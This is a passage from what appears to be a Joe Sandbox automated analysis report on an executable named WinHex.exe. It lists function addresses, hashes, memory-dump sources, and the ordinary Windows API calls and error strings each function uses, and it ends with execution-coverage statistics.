                                                                                                                        • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                        • Instruction Fuzzy Hash: 83819276E0C24385F764BF258150278BFA0AB11F68FDD8035DA0E972D5DBAFE9019721
                                                                                                                        Function 00007FF7C5BDE108 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                        • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction ID: 8fd0a4180529a79987f67a00f98b232d572ca675ef4f1daff232de7ff70e12fe
                                                                                                                        • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                                                                                        • Instruction Fuzzy Hash: 45615A37A08B458AE710AF65D4803ADBBA0FB44BA8F544225EF4D17B98CF79E155C710
                                                                                                                        Function 00007FF7C5BDE464 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                        • String ID: csm$csm
                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                        • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction ID: 861cec2efb88b440bb299a2ce92da199c0b163cd76fdcbb7f3fa895fc930fbbe
                                                                                                                        • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                                                                                        • Instruction Fuzzy Hash: 62519E3290864286EB74AF159544278BFA0EB54FA8F984135FA8C47BDDDF3EE451CB20
                                                                                                                        Function 00007FF7C5BD24D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                        • API String ID: 1878133881-2410924014
                                                                                                                        • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction ID: 40f2f830d6cb25586ab0c568485a885e622365b407f1801c8a2a132c5062b760
                                                                                                                        • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                                                                                        • Instruction Fuzzy Hash: 30317E72628A8281E624BF51E4517EAE765FF84F98FC04136EA8D07A89DF3DD305CB50
                                                                                                                        Function 00007FF7C5BD3BA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD3BD1
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastMessageModuleName
                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                        • API String ID: 2581892565-1977442011
                                                                                                                        • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction ID: e2211c7af756732fbc9e44b6085f28cc2fa999b5bda940ed9b99e70141bfd18d
                                                                                                                        • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction Fuzzy Hash: 12018F32B1C64380FA65BF24E8563B5DA51EF48FE4FD40131D94E8668AEE6FE144C720
                                                                                                                        Function 00007FF7C5BEBA70 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2718003287-0
                                                                                                                        • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                        • Instruction ID: 969b7e7e7140c48dd69eb843a7b922b6291dee36adc2f16ab2742a906d8ae534
                                                                                                                        • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                                                                                        • Instruction Fuzzy Hash: 96D12632B18A8589E720DF75D4402AC7BB1FB44BA8B888235CF4E97BD9DE79D406C310
                                                                                                                        Function 00007FF7C5BD1F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1956198572-0
                                                                                                                        • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                        • Instruction ID: 8a239899139a312af6c369a8ae59a753958b86e2c1205a00176b1f1897ef74de
                                                                                                                        • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                                                                                        • Instruction Fuzzy Hash: 4D11C821E1854242F654AF69E5442B9DA92EF89FE0FC88131EA4D07B9ECE3ED4C58214
                                                                                                                        Function 00007FF7C5BF4D3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                        • Opcode ID: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                                                                                        • Instruction ID: 9b6cef9af9c226dd0b056c39c384eb0d95385f983a37fa27bd5745dedfe55d27
                                                                                                                        • Opcode Fuzzy Hash: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                                                                                        • Instruction Fuzzy Hash: C4411926A0868245FB24AF25A40177AEEA0EF81FB4F944335EF5C07AD9DF3ED4418714
                                                                                                                        Function 00007FF7C5BE7E6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BE7E9E
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
                                                                                                                          • Part of subcall function 00007FF7C5BE9E18: GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C5BDB105), ref: 00007FF7C5BE7EBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                        • String ID: C:\Users\user\AppData\WinHex.exe
                                                                                                                        • API String ID: 3580290477-571040004
                                                                                                                        • Opcode ID: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                                                                                        • Instruction ID: adad81c9dafc3075bd00943ec69807314c9411eb0e8931ff7eef1ff21fe34685
                                                                                                                        • Opcode Fuzzy Hash: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                                                                                        • Instruction Fuzzy Hash: B4416032A08B9285EB14EF25D4400F9ABA5EF44FA0B984035EA4E43B85DF7EE45583A0
                                                                                                                        Function 00007FF7C5BEC108 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                        • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                        • Instruction ID: 86b564f7ece2793c27cc75f915c72c5f412b669e3833d55dfc6d57fdb932ce20
                                                                                                                        • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                                                                                        • Instruction Fuzzy Hash: B441D632718A8182DB20EF25E8443A9BB61FB98BA4FD44131EE4D87798DF7DE441C750
                                                                                                                        Function 00007FF7C5BEE508 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                        • Opcode ID: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                                                                                        • Instruction ID: b48ccf11c82d434470aca984256c0a86325f12405fc905c237fe4a99935100b2
                                                                                                                        • Opcode Fuzzy Hash: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
                                                                                                                        • Instruction Fuzzy Hash: C021E472A0868182EB24AF25D05427EB7F1FB88F54FC94035E64D03284EFBEE946C760
                                                                                                                        Function 00007FF7C5BD2880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: Error detected
                                                                                                                        • API String ID: 1878133881-3513342764
                                                                                                                        • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                        • Instruction ID: 973d8bb9361f371e2a961fad52bbbce5e72c670730194ccc38369960299df003
                                                                                                                        • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                                                                                        • Instruction Fuzzy Hash: C921B67262CA8281EB24AF14F4517EAE764FF84B98FC04135EA8D07A99CF3DD205C760
                                                                                                                        Function 00007FF7C5BD2770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                                                        • String ID: Fatal error detected
                                                                                                                        • API String ID: 1878133881-4025702859
                                                                                                                        • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                        • Instruction ID: af5c1f50579822c41a8965305837a39d015c204bc0257340a02eb66c5b5a6b5d
                                                                                                                        • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                                                                                        • Instruction Fuzzy Hash: D121A472628A8281EB24AF54F4517EAA764FF84B98FC04135EA8D07A99CF3DD205C760
                                                                                                                        Function 00007FF7C5BDEFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                        • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                        • Instruction ID: 5919f08e69fd7447717035359cd2b47a5540598b1afb7f53b055b6dc9e83d735
                                                                                                                        • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                                                                                        • Instruction Fuzzy Hash: 7B114F36608B8182EB259F15F440269BBA5FB88FA4F584231EF8C07768DF3ED591CB00
                                                                                                                        Function 00007FF7C5BEF00C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                        • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction ID: 328887bfced7d6263a41d98d9a9c7161c61e027206c232b550c0b77a596dfb42
                                                                                                                        • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction Fuzzy Hash: 4201A761A1C60785FB32BF60946227EEBA0EF44F28FC81035D54D42696DF7EE544DA24

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:7.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:10.7%
                                                                                                                        Total number of Nodes:1474
                                                                                                                        Total number of Limit Nodes:43
